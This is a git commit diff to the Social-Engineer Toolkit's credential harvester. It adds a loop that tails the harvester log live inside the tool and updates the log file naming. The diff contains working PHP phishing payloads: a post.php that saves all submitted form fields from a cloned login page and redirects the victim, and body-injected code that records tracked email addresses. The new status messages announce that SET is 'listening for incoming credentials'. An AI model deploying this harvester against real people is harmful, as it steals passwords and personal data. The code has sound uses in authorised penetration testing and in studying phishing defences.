Add ability to monitor apache harvester logs within SET instead of having to exit SET completely and go to apache root

2025-04-04 14:56:08 +00:00 · 2016-02-09 11:47:00 -05:00 · 2016-02-09 11:47:00 -05:00 · ec00b9fec0
commit ec00b9fec0
parent 680fcd04a6
3 changed files with 40 additions and 5 deletions
--- a/readme/CHANGES
+++ b/readme/CHANGES
@ -1,3 +1,9 @@
+~~~~~~~~~~~~~~~~
+version 7.0.2
+~~~~~~~~~~~~~~~~
+
+* added a capture recorder within SET so that you don't need to exit when using credential harvester with Apache specified. Can still exit whenever you want and will still be under your apache root directory, but this way - everything is self contained within SET itself.
+
 ~~~~~~~~~~~~~~~~
 version 7.0.1
 ~~~~~~~~~~~~~~~~
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@ -1908,7 +1908,7 @@ def module_reload(module):
    else:
        module_reload(module)

-# used to replace any input that we have from python 2 to python 3 
+# used to replace any input that we have from python 2 to python 3
 def input(string):
 	return raw_input(string)

@ -1921,3 +1921,23 @@ def fetch_template():
        if match:
            line = line.split("=")
            return line[1]
+
+
+# tail a file
+def tail(filename):
+    if os.path.isfile(filename):
+        file = open(filename,'r')
+        st_results = os.stat(filename)
+        st_size = st_results[6]
+        file.seek(st_size)
+
+        while 1:
+            where = file.tell()
+            line = file.readline()
+            if not line:
+                time.sleep(1)
+                file.seek(where)
+            else:
+                print line, # already has newline
+
+    else: print_error("File not found, cannot tail.")
--- a/src/webattack/harvester/harvester.py
+++ b/src/webattack/harvester/harvester.py
@ -4,6 +4,7 @@ import sys
 import os
 import re
 import cgi
+
 # need for python2 -> 3
 try:
    from http.server import *
@ -494,9 +495,10 @@ def run():
        print("Please note that all output from the harvester will be found under apache_dir/harvester_date.txt")
        print("Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC)
        filewrite = open("%s/post.php" % (apache_dir), "w")
-        now = datetime.datetime.today()
+        now = str(datetime.datetime.today())
+        harvester_file = ("harvester_" + now + ".txt")
        filewrite.write(
-            """<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (now, RAW_URL))
+            """<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (harvester_file, RAW_URL))
        filewrite.close()
        if os.path.isdir("/var/www/html"):
            logpath = ("/var/www/html")
@ -527,7 +529,7 @@ def run():
            fileopen = open(setdir + "/web_clone/index.html", "r")
            data = fileopen.read()
            data = data.replace(
-                "<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
+                "<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
            filewrite = open(setdir + "/web_clone/index.2", "w")
            filewrite.write(data)
            filewrite.close()
@ -550,9 +552,16 @@ def run():
                "NOTE: The URL to click on is index.php NOT index.html with track emails.")
        print_status("All files have been copied to %s" % (apache_dir))
        if attack_vector != 'multiattack':
+            try:
+                print_status("SET is now listening for incoming credentials. You can control-c out of this and completely exit SET at anytime and still keep the attack going.")
+                print_status("All files are located under the Apache web root directory: " + apache_dir)
+                print_status("All fields captures will be displayed below.")
+                print("[Credential Harvester is now listening below...]")
+                tail(apache_dir + "/" + harvester_file)
+            except KeyboardInterrupt:
+                print_status("Exiting the menu - note that everything is still running and logging under your web directory path: " + apache_dir)
            pause = input("{Press return to continue}")

-
 class SecureHTTPServer(HTTPServer):

    def __init__(self, server_address, HandlerClass):